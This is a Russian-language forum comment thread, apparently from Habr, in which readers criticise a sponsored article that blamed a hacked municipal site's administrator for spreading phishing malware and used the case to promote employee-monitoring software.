      Специально для вас смягчил заголовок и добавил альтернативное мнение в Update :)


      1. riot26
        06.04.2017 16:43
        #10158354
        +10

        Можно пойти дальше и обвинить в распространении малвари сбербанк.


      1. shurupkirov
        06.04.2017 16:55
        #10158394
        +1

        а я обычно нахожу хостера данных сайтов и жалуюсь им, чтобы они сами связывались с админами сайтов.
        По больше части взломанные сайты идут на старых необновленных версиях ПО Джумлы и Друпала.


        1. lubezniy
          06.04.2017 17:59
          #10158562
          +1

          Мы как-то вышли на владельца домена (сайт был нормальный, но его хакнули и положили копию нашего сайта трёхлетней давности со ссылками на скачивание вредоносного ПО) по whois: был указан телефон. Вопрос решился минут за 10.


          1. shurupkirov
            06.04.2017 18:44
            #10158654

            сейчас whois обычно весь скрытый по-умолчанию


      1. LoadRunner
        06.04.2017 17:01
        #10158416
        +8

        Вы написали на редкость дряную по вкусу джинсу, что спорить с Вами противно. Но, поскольку кто-то может прочитать статью и воспринять всё за чистую монету, немного просвящу и Вас (вдруг это наивность и незнание таких элементарных вещей).

        Ссылка в письме ведёт не на исполняемый файл шифровальщика (а таким способом распространяются в основном они, у меня даже коллекция таких писем есть, которые сотрудники показывали), а на обфусцированный скрипт (его содержимое как раз в статье), который при исполнении как раз и загружает на компьютер жертвы вредоносные файлы и запускает их на исполнение.

        Если бы Вы потрудились деобфусцировать скрипт (мне просто лень делать это, скучно и ничего нового в этом нет, а на Хабре статей про это уже было), то обнаружили ссылки на сайты, откуда качается вредоносное доброзло — сам модуль шифровальщика, размещённый на сайте против воли владельца и админа, которых тоже можно было бы обвинить не только в злоупотреблении служебным положением и отсутствия контроля за рабоичм местом, но и в сговоре с беднягой-админом того сайта, где первый скрипт лежал.


        1. Andrew_I
          06.04.2017 17:06
          #10158436
          -5

          Но знаете, скрипт уже удалили. Значит хоть в чём-то, а польза


          1. LoadRunner
            06.04.2017 17:11
            #10158440
            +4

            Польза от статьи? Очень уж извилистый путь Хабр -> комментарии -> письмо админу сайта. Его можно сократить сразу до письма нужным людям. Поверьте, это лучше и полезнее, и не во вред репутации продукта, который Вы пытаетесь продвигать через Хабр.
            Уверен, что один из читателей всё же накатал абузу админу, и тот принял меры. Надеюсь, он и по сайтам в скрипте тоже прошёлся, чтобы и оттуда всё подчистили.


            1. N0tes
              06.04.2017 17:37
              #10158532
              -7

              Для конкретного сайта — да, но после такой статьи уверен, многие руководители (её прочитавшие) спросят со своих админов.
              И кстати, сайт хостится на reg.ru, а там ПО вроде как обновляется автоматом. Да и внизу сайта написано 2017. Не 2004-2017, а именно 2017


              1. nik_vr
                06.04.2017 17:58
                #10158558
                +5

                Более чем уверен, что в коде там написано: echo date('Y'). И даже если сайт несколько лет не трогали, копирайт в футере будут выглядеть актуальным.


              1. demfloro
                06.04.2017 18:02
                #10158564
                +1

                ПО вебсервера обновляется, а непосредственно саму CMS Joomla хостинг обновлять не будет, это зона ответственности владельца сайта.


      1. Pakos
        07.04.2017 11:47
        #10159792
        +1

        А хостинг покупать с домашнего компа по своей кредитке? Если нет, до дырявая система выглядит проще и логичнее.
        Реклама компании отличная, не знаю чем занимается, но связываться с подобными "профессионалами" никому не рекомендую.


  1. Ugrum
    06.04.2017 16:29
    #10158284
    +2

    Сова и глобус взяты совсем несоразмерные.


  1. WildZero
    06.04.2017 16:30
    #10158290
    +19

    Прекращайте рекламу


  1. avorsa
    06.04.2017 16:32
    #10158296
    +13

    Слабенькая рекламная статья (


  1. redfs
    06.04.2017 16:32
    #10158300
    +5

    главным злоумышленником тут оказался системный администратор
    Бедный системный администратор, попался. Хотя виноват он только в том, что держал уязвивый wp.
    Послушайте, эти malware «от Сбербанка» лежат по всему миру на взломанных wp сайтах. А вы сразу админа под статью… Нехорошо. Недобро.


  1. klylex
    06.04.2017 16:35
    #10158316

    А есть ли у них вообще админ? Возможно, что кто-то занимается поддержкой сайта по совместительству, в целях экономии средств. И тут ни о какой безопасности и речи быть не может.


  1. demfloro
    06.04.2017 16:35
    #10158318

    Или вероятнее всего сайт имеет уязвимости и злоумышленник использует его просто как хостинг. Через уязвимость он мог положить на сервер нужный ему файл, ссылку на которых распространять в подобных фишинг-рассылках. Это частое явление.


  1. romache
    06.04.2017 16:39
    #10158338

    Подобные письма активно рассылаются последнее время.
    Все ссылки ведут на взломанные сайты. Про «админа-злодея» глупости.


  1. nojoke
    06.04.2017 16:41
    #10158344
    +1

    Путь к файлу как бы намекает на поломанную joomla.
    Конкретнее 3.4.
    Включена регистрация новых пользователей.
    И еще 2 удаленных дырки с Remote Code Execution


    1. AcidVenom
      06.04.2017 16:46
      #10158376

      Может, и позднее.


      1. nojoke
        06.04.2017 16:48
        #10158382
        +1

        Там же README.txt в корне сайта :)


  1. AcidVenom
    06.04.2017 16:42
    #10158348

    Да тут и Эквадор задействован! /sarcazm

    Свеженькое


  1. Ugrum
    06.04.2017 16:44
    #10158372

    Но и контроль нужен, чтобы админ не положил скрипт сам, а потом не сказал — ой, меня взломали.


    Не, ну если админу так сильно надо положить скрипт, то зачем ему это делать с рабочей машины, в рабочее время?
    Это уже совсем за гранью добра и зла тупизны.


    1. qw1
      06.04.2017 17:11
      #10158438
      +2

      Самое смешное, если эта реклама дойдёт до ЦА и директор согласится: да, kickidler, давайте, ставьте свой контроль. А админ работает… на FreeBSD :)


      1. izzholtik
        06.04.2017 19:52
        #10158762

        Я так почти год на винде просидел >:


        1. qw1
          06.04.2017 22:32
          #10159006
          +1

          А когда ввели программы контроля, пересели в линукс?


  1. dartraiden
    06.04.2017 17:00
    #10158404
    +1

    Штатного администратора, наверное, вообще нет, кто-нибудь изредка обслуживает это на полставки.
    Ящик на mail.ru тоже намекает.
    Если домен не протухает и вовремя проплачивается, это уже хорошо.

    Ну, и это не первый описанных на хабре случай, когда со взломанного сайта администрации N-ского района распространяется всякое. Неизбежное следствие крайне скудного финансирования. Банально некому оперативно накатывать патчи.


  1. Ernado
    06.04.2017 17:22
    #10158466
    +1

    Думаю, вам стоит убрать гипер-ссылку на "систему контроля сотрудников." А то создается впечатление, что вся та ерунда, что была вами написана, нужна была только для того, чтобы было куда вставить рекламу.


  1. ilya_pu
    06.04.2017 17:26
    #10158486
    +2

    IMHO, админ здесь вообще «не в теме» (как сказали выше, чинит принтеры, настраивает сетку и бодается с бухгалтерией). Год назад сам столкнулся с ситуацией, когда одна очень уважаемая организация (госструктура, если что), занимающаяся вопросами интернета (!) и информационной безопасности (!!), не соблаговолила при переезде на другой адрес своего сайта не то чтобы редирект оформить, но и сам старый адрес хотя бы на год продлить. В итоге: старый адрес в тот же день был перекуплен, на него залиты материалы 18+ (ага, «клубничка»), а поисковики ака яндекс и гугль очень неохотно «отвязывали» этот старый адрес от поисковой выдачи по запросу с названием организации… По названию организации ещё месяца три выдавался старый адрес, но — с новым контентом (да, новые хозяева домена постарались сохранить часть внутреннего содержания старого сайта, чтобы воспользоваться его «кармой»). Так что… я уже ничему не удивляюсь… ну а чего вы хотите от человека с з/п тысяч 15-20? (пруф) Навряд ли тот админ в районе с 5-значным телефонным кодом получает существенно больше… И кто в такой ситуации сможет адекватно оценить и проконтролировать его работу?


  1. ZoomLS
    06.04.2017 17:31
    #10158504
    +7

    >>А значит надо использовать систему контроля сотрудников.

    А сотрудникам, уходить из такой компании, после внедрения такого большого брата.


  1. Akuma
    06.04.2017 18:31
    #10158624
    +2

    Какая-то у вас реклама не правильная.

    Если опустить тот момент, что слежка за сотрудниками с их точки зрения — злобное зло, то вы все равно предлагаете слежку за админом :) Кто будет этот софт ставить на компьютеры? Правильно — этот же админ. Он что идиот, чтобы за собой следить?

    А вообще интересно, вы проводили исследования, каков процент увольнений после установки подобной системы? Вот я бы ушел, например.


    1. dartraiden
      06.04.2017 19:14
      #10158720
      +2

      Тут, скорее, вопрос стоит не «кто будет ставить», а «откуда найдутся средства на покупку этой системы слежения». Ведь их не хватает даже на нормальную зарплату этому админу. А будь там нормальная зарплата, можно было бы заиметь и хорошего админа, который не допускал бы инцидентов.

      «Денег нет, но вы администрируйте там».


  1. OldFisher
    06.04.2017 19:41
    #10158750
    +4

    Если прибегнуть к логике автора (ставить kickidler, чтобы работник качественно трудился, а не делал быстренько тяп-ляп сикось-накось), то в первую очередь следует проделывать такое с авторами статей из блога этой компании. Можно будет сразу видеть, действительно ли человек трудился, работал с источниками, писал на совесть. Заодно и автор будет знать о преимуществах продукта из первых рук.


  1. point212
    06.04.2017 19:44
    #10158758
    +1

    Какие глупости порой пишут люди, лишь бы попиариться.
    А ничо, что проще всего взломать какой-нить сайт и туда кинуть код шелла, и остаться типа не при делах?
    Никогда не слышали про такое?


  1. pewpew
    07.04.2017 09:16
    #10159404
    +1

    Как мерзко и низко настолько не доверять своим сотрудникам, чтобы пришлось палить каждый из чих.


  1. Neikist
    07.04.2017 09:37
    #10159438

    Интересно, а админ того сайта сможет обвинить авторов статьи в клевете? Ведь очевидно что он с вероятностью 99% ни при чем. Может хоть кому то закон послужил бы.


  1. Ugrum
    07.04.2017 13:04
    #10160032
    +3

    Подводим итоги судебного заседания.
    Большое жюри присяжных единодушно признаёт абсолютно недоказанным обвинение админа в намеренном распространении малвари, допуская при этом возможную халатность исполнения им своих должностных обязанностей.
    Ответчик имеет право на требование возмещения морального вреда и репутационного урона, возникших вследствие необоснованного обвинения.
    Админь!